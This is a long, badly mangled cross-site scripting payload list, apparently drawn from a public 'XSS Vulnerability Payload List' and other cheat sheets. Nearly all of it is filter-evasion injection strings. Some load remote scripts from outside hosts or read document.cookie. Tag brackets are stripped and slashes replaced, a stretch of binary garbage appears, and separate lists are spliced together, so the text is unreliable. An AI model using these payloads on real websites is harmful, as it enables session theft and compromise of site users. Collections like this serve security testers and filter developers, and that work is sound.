id=d x xmlns=" iframe onload=javascript:alert(1)" div script d.innerHTML=d.innerHTML script img \x00src=x onerror="alert(1)" img \x47src=x onerror="javascript:alert(1)" img \x11src=x onerror="javascript:alert(1)" img \x12src=x onerror="javascript:alert(1)" img\x47src=x onerror="javascript:alert(1)" img\x10src=x onerror="javascript:alert(1)" img\x13src=x onerror="javascript:alert(1)" img\x32src=x onerror="javascript:alert(1)" img\x47src=x onerror="javascript:alert(1)" img\x11src=x onerror="javascript:alert(1)" img \x47src=x onerror="javascript:alert(1)" img \x34src=x onerror="javascript:alert(1)" img \x39src=x onerror="javascript:alert(1)" img \x00src=x onerror="javascript:alert(1)" img src\x09=x onerror="javascript:alert(1)" img src\x10=x onerror="javascript:alert(1)" img src\x13=x onerror="javascript:alert(1)" img src\x32=x onerror="javascript:alert(1)" img src\x12=x onerror="javascript:alert(1)" img src\x11=x onerror="javascript:alert(1)" img src\x00=x onerror="javascript:alert(1)" img src\x47=x onerror="javascript:alert(1)" img src=x\x09onerror="javascript:alert(1)" img src=x\x10onerror="javascript:alert(1)" img src=x\x11onerror="javascript:alert(1)" img src=x\x12onerror="javascript:alert(1)" img src=x\x13onerror="javascript:alert(1)" img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)" img src=x onerror=\x09"javascript:alert(1)" img src=x onerror=\x10"javascript:alert(1)" img src=x onerror=\x11"javascript:alert(1)" img src=x onerror=\x12"javascript:alert(1)" img src=x onerror=\x32"javascript:alert(1)" img src=x onerror=\x00"javascript:alert(1)" a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1) XXX a img src="x` ` script javascript:alert(1) script "` ` img src onerror " '"= alt=javascript:alert(1) " title onpropertychange=javascript:alert(1) title title title= a href=http: foo.bar #x=`y a img alt="` img src=x:x onerror=javascript:alert(1) a " ! [if] script javascript:alert(1) script ! [if img src=x onerror=javascript:alert(1) ] script src=" \%(jscript)s" script script src="\\%(jscript)s" script object id="x" classid="clsid:CB927D12 4FF7 4a9e A169 56E4B8A75598" object object classid="clsid:02BF25D5 8C17 4B23 BC80 D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);" param name=postdomevents object a style=" o link:'javascript:javascript:alert(1)'; o link source:current" X style p[foo=bar{}*{ o link:'javascript:javascript:alert(1)'}{}*{ o link source:current}]{color:red}; style link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d style @import "data:,*%7bx:expression(javascript:alert(1))%7D"; style a style="pointer events:none;position:absolute;" a style="position:absolute;" onclick="javascript:alert(1);" XXX a a a href="javascript:javascript:alert(1)" XXX a style *[{}@import'%(css)s?] style X div style="font family:'foo
;color:red;';" XXX div style="font family:foo}color=red;" XXX style=x:expression\28javascript:alert(1)\29 style *{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))} style div style=content:url(%(svg)s) div div style="list style:url(http: foo.f)\20url(javascript:javascript:alert(1));" X div id=d div style="font family:'sans\27\3B color\3Ared\3B'" X div div script with(document.getElementById("d"))innerHTML=innerHTML script div style="background:url( f#oo ;color:red * foo.jpg);" X div style="font family:foo{bar;background:url(http: foo.f oo};color:red * foo.jpg);" X div id="x" XXX div style #x{font family:foo[bar;color:green;} #y];color:red;{} style x style="background:url('x;color:red; *')" XXX x script ({set ** $($){_ ** setter=$,_=javascript:alert(1)}}).$=eval script script ({0:#0=eval #0# #0#(javascript:alert(1))}) script script ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x script script Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')() script meta charset="x imap4 modified utf7" &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi meta charset="x imap4 modified utf7" & script&S1&TS&1 alert&A7&(1)&R&UA;&& &A9&11 script&X& meta charset="mac farsi" ¼script¾javascript:alert(1)¼ script¾ X x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` 1 set xmlns=`urn:schemas microsoft com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img src="x"onerror=javascript:alert(1)>` 1 animate xmlns=urn:schemas microsoft com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img src="."onerror=javascript:alert(1)> vmlframe xmlns=urn:schemas microsoft com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss vmlframe 1 a href=# line xmlns=urn:schemas microsoft com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 a a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)" XXX a x style="behavior:url(%(sct)s)" xml id="xss" src="%(htc)s" xml label dataformatas="html" datasrc="#xss" datafld="payload" label event source src="%(event)s" onload="javascript:alert(1)" a href="javascript:javascript:alert(1)" event source src="data:application x dom event stream,Event:click%0Adata:XXX%0A%0A" div id="x" x div xml:namespace prefix="t" import namespace="t" implementation="#default#time2" t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>" script %(payload)s script script src=%(jscript)s script script language='javascript' src='%(jscript)s' script script javascript:alert(1) script IMG SRC="javascript:javascript:alert(1);" IMG SRC=javascript:javascript:alert(1) IMG SRC=`javascript:javascript:alert(1)` SCRIPT SRC=%(jscript)s? B FRAMESET FRAME SRC="javascript:javascript:alert(1);" FRAMESET BODY ONLOAD=javascript:alert(1) BODY ONLOAD=javascript:javascript:alert(1) IMG SRC="jav ascript:javascript:alert(1);" BODY onload!#$%%&()*~ _.,:;?@[ ](/motoyasu-saburi/sandbox/wiki/\]^`=javascript:alert(1)---SCRIPT-SRC="%(jscript)s"---SCRIPT----SCRIPT-%(payload)s-----SCRIPT---IMG-SRC="javascript:javascript:alert(1)"--iframe-src=%(scriptlet)s----INPUT-TYPE="IMAGE"-SRC="javascript:javascript:alert(1);"---IMG-DYNSRC="javascript:javascript:alert(1)"---IMG-LOWSRC="javascript:javascript:alert(1)"---BGSOUND-SRC="javascript:javascript:alert(1);"---BR-SIZE="&{javascript:alert(1)}"---LAYER-SRC="%(scriptlet)s"---LAYER---LINK-REL="stylesheet"-HREF="javascript:javascript:alert(1);"---STYLE-@import'%(css)s';--STYLE---META-HTTP-EQUIV="Link"-Content="-%(css)s-;-REL=stylesheet"---XSS-STYLE="behavior:-url(%(htc)s);"---STYLE-li-{list-style-image:-url("javascript:javascript:alert(1)");}--STYLE--UL--LI-XSS--META-HTTP-EQUIV="refresh"-CONTENT="0;url=javascript:javascript:alert(1);"---META-HTTP-EQUIV="refresh"-CONTENT="0;-URL=http:--;URL=javascript:javascript:alert(1);"---IFRAME-SRC="javascript:javascript:alert(1);"---IFRAME---TABLE-BACKGROUND="javascript:javascript:alert(1)"---TABLE--TD-BACKGROUND="javascript:javascript:alert(1)"---DIV-STYLE="background-image:-url(javascript:javascript:alert(1))"---DIV-STYLE="width:expression(javascript:alert(1));"---IMG-STYLE="xss:expr-*XSS*-ession(javascript:alert(1))"---XSS-STYLE="xss:expression(javascript:alert(1))"---STYLE-TYPE="text-javascript"-javascript:alert(1);--STYLE---STYLE-.XSS{background-image:url("javascript:javascript:alert(1)");}--STYLE--A-CLASS=XSS---A---STYLE-type="text-css"-BODY{background:url("javascript:javascript:alert(1)")}--STYLE---!--[if-gte-IE-4]--SCRIPT-javascript:alert(1);--SCRIPT--![endif]-----BASE-HREF="javascript:javascript:alert(1);--"---OBJECT-TYPE="text-x-scriptlet"-DATA="%(scriptlet)s"---OBJECT---OBJECT-classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389--param-name=url-value=javascript:javascript:alert(1)---OBJECT---HTML-xmlns:xss--?import-namespace="xss"-implementation="%(htc)s"--xss:xss-XSS--xss:xss---HTML-""","XML-namespace."),("""-XML-ID="xss"--I--B-<IMG-SRC="javas-!------cript:javascript:alert(1)">--B---I---XML--SPAN-DATASRC="#xss"-DATAFLD="B"-DATAFORMATAS="HTML"---SPAN---HTML--BODY--?xml:namespace-prefix="t"-ns="urn:schemas-microsoft-com:time"--?import-namespace="t"-implementation="#default#time2"--t:set-attributeName="innerHTML"-to="XSS<SCRIPT-DEFER>javascript:alert(1)<-SCRIPT>"---BODY---HTML---SCRIPT-SRC="%(jpg)s"---SCRIPT---HEAD--META-HTTP-EQUIV="CONTENT-TYPE"-CONTENT="text-html;-charset=UTF-7"----HEAD--ADw-SCRIPT-AD4-%(payload)s;-ADw--SCRIPT-AD4---form-id="test"----button-form="test"-formaction="javascript:javascript:alert(1)"-X--body-onscroll=javascript:alert(1)--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--input-autofocus---P-STYLE="behavior:url('#default#time2')"-end="0"-onEnd="javascript:alert(1)"---STYLE-@import'%(css)s';--STYLE---STYLE-a{background:url('s1'-'s2)}@import-javascript:javascript:alert(1);');}--STYLE---meta-charset=-"x-imap4-modified-utf7"&&-&&-script&&-javascript:alert(1)&&;&&-&&-script&&---SCRIPT-onreadystatechange=javascript:javascript:alert(1);---SCRIPT---style-onreadystatechange=javascript:javascript:alert(1);---style---?xml-version="1.0"?--html:html-xmlns:html='http:--www.w3.org-1999-xhtml'--html:script-javascript:alert(1);--html:script---html:html---embed-code=%(scriptlet)s---embed---embed-code=javascript:javascript:alert(1);---embed---embed-src=%(jscript)s---embed---frameset-onload=javascript:javascript:alert(1)---frameset---object-onerror=javascript:javascript:alert(1)---embed-type="image"-src=%(scriptlet)s---embed---XML-ID=I--X--C--![CDATA[-IMG-SRC="javas) ![CDATA[cript:javascript:alert(1);" ]] C X xml IMG SRC=&{javascript:alert(1);}; a href="jav&#65ascript:javascript:alert(1)" test1 a a href="jav&#97ascript:javascript:alert(1)" test1 a embed width=500 height=500 code="data:text html, script %(payload)s script " embed iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)> " ';alert(String.fromCharCode(88,83,83)) ';alert(String.fromCharCode(88,83,83)) "; alert(String.fromCharCode(88,83,83)) ";alert(String.fromCharCode(88,83,83)) SCRIPT " ' SCRIPT alert(String.fromCharCode(88,83,83)) SCRIPT '';! " XSS =&{()} SCRIPT SRC=http: ha.ckers.org xss.js SCRIPT IMG SRC="javascript:alert('XSS');" IMG SRC=javascript:alert('XSS') IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=javascript:alert("XSS") IMG SRC=`javascript:alert("RSnake says, 'XSS'")` a onmouseover="alert(document.cookie)" xxs link a a onmouseover=alert(document.cookie) xxs link a IMG """ SCRIPT alert("XSS") SCRIPT " IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG SRC=# onmouseover="alert('xxs')" IMG SRC= onmouseover="alert('xxs')" IMG onmouseover="alert('xxs')" IMG SRC=javascript:alert('XSS') IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" perl e 'print " IMG SRC=java\0script:alert(\"XSS\") ";' out IMG SRC="  javascript:alert('XSS');" SCRIPT XSS SRC="http: ha.ckers.org xss.js" SCRIPT BODY onload!#$%&()*~ _.,:;?@[ |\]^`=alert("XSS") SCRIPT SRC="http: ha.ckers.org xss.js" SCRIPT SCRIPT alert("XSS"); SCRIPT SCRIPT SRC=http: ha.ckers.org xss.js? B SCRIPT SRC= ha.ckers.org .j IMG SRC="javascript:alert('XSS')" iframe src=http: ha.ckers.org scriptlet.html \";alert('XSS'); TITLE SCRIPT alert("XSS"); SCRIPT INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');" BODY BACKGROUND="javascript:alert('XSS')" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" STYLE li {list style image: url("javascript:alert('XSS')");} STYLE UL LI XSS br IMG SRC='vbscript:msgbox("XSS")' IMG SRC="livescript:[code]" BODY ONLOAD=alert('XSS') BGSOUND SRC="javascript:alert('XSS');" BR SIZE="&{alert('XSS')}" LINK REL="stylesheet" HREF="javascript:alert('XSS');" LINK REL="stylesheet" HREF="http: ha.ckers.org xss.css" STYLE @import'http: ha.ckers.org xss.css'; STYLE META HTTP EQUIV="Link" Content=" http: ha.ckers.org xss.css ; REL=stylesheet" STYLE BODY{ moz binding:url("http: ha.ckers.org xssmoz.xml#xss")} STYLE STYLE @im\port'\ja\vasc\ript:alert("XSS")'; STYLE IMG STYLE="xss:expr *XSS* ession(alert('XSS'))" exp * A STYLE='no\xss:noxss("* *");xss:ex *XSS* * * pression(alert("XSS"))' STYLE TYPE="text javascript" alert('XSS'); STYLE STYLE .XSS{background image:url("javascript:alert('XSS')");} STYLE A CLASS=XSS A STYLE type="text css" BODY{background:url("javascript:alert('XSS')")} STYLE STYLE type="text css" BODY{background:url("javascript:alert('XSS')")} STYLE XSS STYLE="xss:expression(alert('XSS'))" XSS STYLE="behavior: url(xss.htc);" ¼script¾alert(¢XSS¢)¼ script¾ META HTTP EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');" META HTTP EQUIV="refresh" CONTENT="0;url=data:text html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" META HTTP EQUIV="refresh" CONTENT="0; URL=http: ;URL=javascript:alert('XSS');" IFRAME SRC="javascript:alert('XSS');" IFRAME IFRAME SRC=# onmouseover="alert(document.cookie)" IFRAME FRAMESET FRAME SRC="javascript:alert('XSS');" FRAMESET TABLE BACKGROUND="javascript:alert('XSS')" TABLE TD BACKGROUND="javascript:alert('XSS')" DIV STYLE="background image: url(javascript:alert('XSS'))" DIV STYLE="background image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029" DIV STYLE="background image: url(javascript:alert('XSS'))" DIV STYLE="width: expression(alert('XSS'));" BASE HREF="javascript:alert('XSS'); " OBJECT TYPE="text x scriptlet" DATA="http: ha.ckers.org scriptlet.html" OBJECT EMBED SRC="data:image svg xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image svg xml" AllowScriptAccess="always" EMBED SCRIPT SRC="http: ha.ckers.org xss.jpg" SCRIPT ! #exec cmd=" bin echo ' SCR'" ! #exec cmd=" bin echo 'IPT SRC=http: ha.ckers.org xss.js SCRIPT '" ? echo(' SCR)';echo('IPT alert("XSS") SCRIPT '); ? IMG SRC="http: www.thesiteyouareon.com somecommand.php?somevariables=maliciouscode" Redirect 302 a.jpg http: victimsite.com admin.asp&deleteuser META HTTP EQUIV="Set Cookie" Content="USERID= SCRIPT alert('XSS') SCRIPT " HEAD META HTTP EQUIV="CONTENT TYPE" CONTENT="text html; charset=UTF 7" HEAD ADw SCRIPT AD4 alert('XSS'); ADw SCRIPT AD4 SCRIPT a=" " SRC="http: ha.ckers.org xss.js" SCRIPT SCRIPT =" " SRC="http: ha.ckers.org xss.js" SCRIPT SCRIPT a=" " '' SRC="http: ha.ckers.org xss.js" SCRIPT SCRIPT "a=' '" SRC="http: ha.ckers.org xss.js" SCRIPT SCRIPT a=` ` SRC="http: ha.ckers.org xss.js" SCRIPT SCRIPT a=" ' " SRC="http: ha.ckers.org xss.js" SCRIPT SCRIPT document.write(" SCRI"); SCRIPT PT SRC="http: ha.ckers.org xss.js" SCRIPT A HREF="http: 66.102.7.147 " XSS A A HREF="http: %77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D" XSS A A HREF="http: 1113982867 " XSS A A HREF="http: 0x42.0x0000066.0x7.0x93 " XSS A A HREF="http: 0102.0146.0007.00000223 " XSS A A HREF="htt p: 6 6.000146.0x7.147 " XSS A iframe %00 src="	javascript:prompt(1)	"%00 svg style {font family:' iframe onload=confirm(1) ' input onmouseover="javaSCRIPT:confirm(1)" sVg scRipt %00 alert(1) {Opera} img src=`%00` onerror=this.onerror=confirm(1) form isindex formaction="javascript:confirm(1)" img src=`%00`
 onerror=alert(1)
 script 	 src='https: dl.dropbox.com u 13018058 js.js' 	 script ScRipT 5 0*3 9 3= prompt(1) ScRipT giveanswerhere=? iframe src="data:text html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==" script *%00* *%00* alert(1) *%00* script *%00* "> h1 onmouseover='\u0061lert(1)' %00 iframe src="data:text html, svg onload=alert(1) " meta content="
 1 
; JAVASCRIPT: alert(1)" http equiv="refresh" svg script xlink:href=data:,window.open('https: www.google.com ') script svg script x:href='https: dl.dropbox.com u 13018058 js.js' {Opera} meta http equiv="refresh" content="0;url=javascript:confirm(1)" iframe src=javascript:alert(document.location) form a href="javascript:\u0061lert(1)" X script img *%00 src="worksinchrome:prompt(1)" %00* onerror='eval(src)' img 	
 src=`~` onerror=prompt(1) form iframe 	
 src="javascript:alert(1)"
	; a href="data:application x x509 user cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
 X a http: www.google script .com alert(document.location) script a href=[�]"� onmouseover=prompt(1)//" XYZ a img src=@ 
 onerror = prompt('1') style onload=prompt('XSS') script ^__^ alert(String.fromCharCode(49)) script ^__^ style   script   : ( ** alert(document.location) ** script   : ( � form input type="date" onfocus="alert(1)" form textarea 
 onkeyup='\u0061\u006C\u0065\u0072\u0074(1)' script *** *** confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450') *** script *** iframe srcdoc='<body onload=prompt(1)>' a href="javascript:void(0)" onmouseover=
javascript:alert(1)
 X a script ~~~ alert(0%0) script ~~~ style onload=<! 	>
alert
(1) style span %2F onmousemove='alert(1)' SPAN img src='http: i.imgur.com P8mL8.jpg' onmouseover=	prompt(1) "> svg style { o link source:' body onload=confirm(1) ' 
 blink 
 onmouseover=prompt(1) OnMouseOver {Firefox & Opera} marquee onstart='javascript:alert(1)' ^__^ div style="width:expression(confirm(1))" X div {IE7} iframe %00 src=javaSCRIPT:alert(1) form action=javascript:alert(document.cookie) input type='submit' *iframe src* iframe src=" iframe src=@" onload=prompt(1) *iframe src* |\\ script |\\ src='https: dl.dropbox.com u 13018058 js.js' |\\ script |\\ font svg style {src:' style onload=this.onload=confirm(1) ' font style a href="javascript:
 javascript:prompt(1)" input type="X" plaintext\ |\ plaintext onmouseover=prompt(1) svg '' svg script 'AQuickBrownFoxJumpsOverTheLazyDog' alert(1) {Opera} a href="javascript:\u0061l&#101%72t(1)" button div onmouseover='alert(1)' DIV div iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" a href="jAvAsCrIpT:alert(1)" X a embed src="http: corkami.googlecode.com svn !svn bc 480 trunk misc pdf helloworld_js_X.pdf" object data="http: corkami.googlecode.com svn !svn bc 480 trunk misc pdf helloworld_js_X.pdf" var onmouseover="prompt(1)" On Mouse Over var a href=javascript:alert(document.cookie) Click Here a img src=" " =_=" title="onerror='prompt(1)'" % ! '% script alert(1); script script src="data:text javascript,alert(1)" script iframe src \ \ onload = prompt(1) iframe onreadystatechange=alert(1) svg onload=alert(1) input value= iframe src=javascript:confirm(1) input type="text" value= div onmouseover='alert(1)' X div http: www. script alert(1) script .com iframe src=j a v a s c r i p t :a l e r t 28 1 %29 iframe svg script ? alert(1) iframe src=j a v a s c r i p t :a l e r t %28 1 %29 iframe img src=xx:xxonerror=alert(1) object type="text x scriptlet" data="http: jsfiddle.net XLE63 " object meta http equiv="refresh" content="0;javascript:alert(1)" math a xlink:href=" jsfiddle.net t846h " click embed code="http: businessinfo.co.uk labs xss xss.swf" allowscriptaccess=always svg contentScriptType=text vbs script MsgBox 1 a href="data:text html;base64_, svg onload=\u0061l&#101%72t(1) " X a iframe onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE script '\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074('\u0061') script U script src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')" script a=\u0061 & =%2F script src=data:text j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74( XSS ) script object data=javascript:\u0061l&#101%72t(1) script 1 alert(1) script body onload=<! >&#10alert(1) script itworksinallbrowsers * script * alert(1) script img src ?itworksonchrome?\ onerror = alert(1) svg script confirm(1); script svg svg script onlypossibleinopera: ) alert(1) a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1) ClickMe script x alert(1) script 1=2 div onmouseover='alert(1)' style="x:" img src= onerror=alert(1) ! script src=&#100&#97&#116&#97:text &#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,ale&#x00000072;t(1) script div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)" x button " img src=x onerror=window.open('https: www.google.com '); form button formaction=javascript:alert(1) CLICKME math a xlink:href=" jsfiddle.net t846h " click object data=data:text html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik object iframe src="data:text html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" iframe a href="data:text html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203" Click Me a ‘; alert(1); ‘)alert(1); ScRiPt alert(1) sCriPt IMG SRC=jAVasCrIPt:alert(‘XSS’) IMG SRC=”javascript:alert(‘XSS’);” IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert(‘XSS’) img src=xss onerror=alert(1) iframe %00 src=" javascript:prompt(1) "%00 svg style {font family:' iframe onload=confirm(1) ' input onmouseover="javaSCRIPT:confirm(1)" sVg scRipt %00 alert(1) {Opera} img src=%00 onerror=this.onerror=confirm(1) form isindex formaction="javascript:confirm(1)" img src=%00 onerror=alert(1) script src='https: dl.dropbox.com u 13018058 js.js' script ScRipT 5 03 9 3= prompt(1) ScRipT giveanswerhere=? iframe src="data:text html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==" script %00 %00 alert(1) %00 script %00 "> h1 onmouseover='\u0061lert(1)' %00 iframe src="data:text html, svg onload=alert(1) " meta content=" 1 ; JAVASCRIPT: alert(1)" http equiv="refresh" svg script xlink:href=data:,window.open('https: www.google.com ') script svg script x:href='https: dl.dropbox.com u 13018058 js.js' {Opera} meta http equiv="refresh" content="0;url=javascript:confirm(1)" iframe src=javascript:alert(document.location) form a href="javascript:\u0061lert(1)" X script img %00 src="worksinchrome:prompt(1)" %00 onerror='eval(src)' img  src=~ onerror=prompt(1) form iframe  src="javascript:alert(1)" ; a href="data:application x x509 user cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="  X a http: www.google script .com alert(document.location) script a href=[�]"� onmouseover=prompt(1)//" XYZ a img src=@ onerror = prompt('1') style onload=prompt('XSS') script ^^ alert(String.fromCharCode(49)) script ^^ style script : ( ** alert(document.location) ** script : ( � form input type="date" onfocus="alert(1)" form textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)' script *** *** confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450') *** script *** iframe srcdoc='<body onload=prompt(1)>' a href="javascript:void(0)" onmouseover= javascript:alert(1) X a script ~~~ alert(0%0) script ~~~ style onload=<! > alert (1) style span %2F onmousemove='alert(1)' SPAN img src='http: i.imgur.com P8mL8.jpg' onmouseover= prompt(1) "> svg style { o link source:' body onload=confirm(1) ' blink onmouseover=prompt(1) OnMouseOver {Firefox & Opera} marquee onstart='javascript:alert(1)' ^__^ div style="width:expression(confirm(1))" X div {IE7} iframe %00 src=javaSCRIPT:alert(1) form action=javascript:alert(document.cookie) input type='submit' iframe src iframe src=" iframe src=@" onload=prompt(1) iframe src |\ script |\ src='https: dl.dropbox.com u 13018058 js.js' |\ script |\ font svg style {src:' style onload=this.onload=confirm(1) ' font style a href="javascript: javascript:prompt(1)" input type="X" plaintext\ |\ plaintext onmouseover=prompt(1) svg '' svg script 'AQuickBrownFoxJumpsOverTheLazyDog' alert(1) {Opera} a href="javascript:\u0061l&#101%72t(1)" button div onmouseover='alert(1)' DIV div iframe style="xg p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" a href="jAvAsCrIpT:alert(1)" X a embed src="http: corkami.googlecode.com svn !svn bc 480 trunk misc pdf helloworld_js_X.pdf" object data="http: corkami.googlecode.com svn !svn bc 480 trunk misc pdf helloworld_js_X.pdf" var onmouseover="prompt(1)" On Mouse Over var a href=javascript:alert(document.cookie) Click Here a img src=" " ==" title="onerror='prompt(1)'" % ! '% script alert(1); script script src="data:text javascript,alert(1)" script iframe src \ \ onload = prompt(1) iframe onreadystatechange=alert(1) svg onload=alert(1) input value= iframe src=javascript:confirm(1) input type="text" value=`` div onmouseover='alert(1)' X div http: www. script alert(1) script .com iframe src=j a v a s c r i p t :a l e r t 28 1 %29 iframe svg script ? alert(1) iframe src=j a v a s c r i p t :a l e r t %28 1 %29 iframe img src=xx:xxonerror=alert(1) meta http equiv="refresh" content="0;javascript:alert(1)" math a xlink:href=" jsfiddle.net t846h " click embed code="http: businessinfo.co.uk labs xss xss.swf" allowscriptaccess=always svg contentScriptType=text vbs script MsgBox 1 a href="data:text html;base64, svg onload=\u0061l&#101%72t(1) " X a iframe onreadystatechange=\u00Gcp�3�lNƪ�2M�2100644 Home" ' \ textarea &0"'¥"¥'u000 ](/motoyasu-saburi/sandbox/wiki/-!---Project-Name--:-Cross-Site-Scripting-(-XSS-)-Vulnerability-Payload-List------!----------Author-:-Ismail-Tasdelen------!--------Linkedin-:-https:--www.linkedin.com-in-ismailtasdelen-------!----------GitHub-:-https:--github.com-ismailtasdelen-------!---------Twitter-:-https:--twitter.com-ismailtsdln------!----------Medium-:-https:--medium.com-@ismailtasdelen-------script%5Cx20type=%22text-javascript%22-javascript:alert(1);--script---script%5Cx3Etype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Dtype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx09type=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Ctype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx2Ftype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Atype=%22text-javascript%22-javascript:alert(1);--script--'%60%22--%5Cx3Cscript-javascript:alert(1)--script----------'%60%22--%5Cx00script-javascript:alert(1)--script---img-src=1-href=1-onerror=%22javascript:alert(1)%22---img---audio-src=1-href=1-onerror=%22javascript:alert(1)%22---audio---video-src=1-href=1-onerror=%22javascript:alert(1)%22---video---body-src=1-href=1-onerror=%22javascript:alert(1)%22---body---image-src=1-href=1-onerror=%22javascript:alert(1)%22---image---object-src=1-href=1-onerror=%22javascript:alert(1)%22---object---script-src=1-href=1-onerror=%22javascript:alert(1)%22---script---svg-onResize-svg-onResize=%22javascript:javascript:alert(1)%22---svg-onResize---title-onPropertyChange-title-onPropertyChange=%22javascript:javascript:alert(1)%22---title-onPropertyChange---iframe-onLoad-iframe-onLoad=%22javascript:javascript:alert(1)%22---iframe-onLoad---body-onMouseEnter-body-onMouseEnter=%22javascript:javascript:alert(1)%22---body-onMouseEnter---body-onFocus-body-onFocus=%22javascript:javascript:alert(1)%22---body-onFocus---frameset-onScroll-frameset-onScroll=%22javascript:javascript:alert(1)%22---frameset-onScroll---script-onReadyStateChange-script-onReadyStateChange=%22javascript:javascript:alert(1)%22---script-onReadyStateChange---html-onMouseUp-html-onMouseUp=%22javascript:javascript:alert(1)%22---html-onMouseUp---body-onPropertyChange-body-onPropertyChange=%22javascript:javascript:alert(1)%22---body-onPropertyChange---svg-onLoad-svg-onLoad=%22javascript:javascript:alert(1)%22---svg-onLoad---body-onPageHide-body-onPageHide=%22javascript:javascript:alert(1)%22---body-onPageHide---body-onMouseOver-body-onMouseOver=%22javascript:javascript:alert(1)%22---body-onMouseOver---body-onUnload-body-onUnload=%22javascript:javascript:alert(1)%22---body-onUnload---body-onLoad-body-onLoad=%22javascript:javascript:alert(1)%22---body-onLoad---bgsound-onPropertyChange-bgsound-onPropertyChange=%22javascript:javascript:alert(1)%22---bgsound-onPropertyChange---html-onMouseLeave-html-onMouseLeave=%22javascript:javascript:alert(1)%22---html-onMouseLeave---html-onMouseWheel-html-onMouseWheel=%22javascript:javascript:alert(1)%22---html-onMo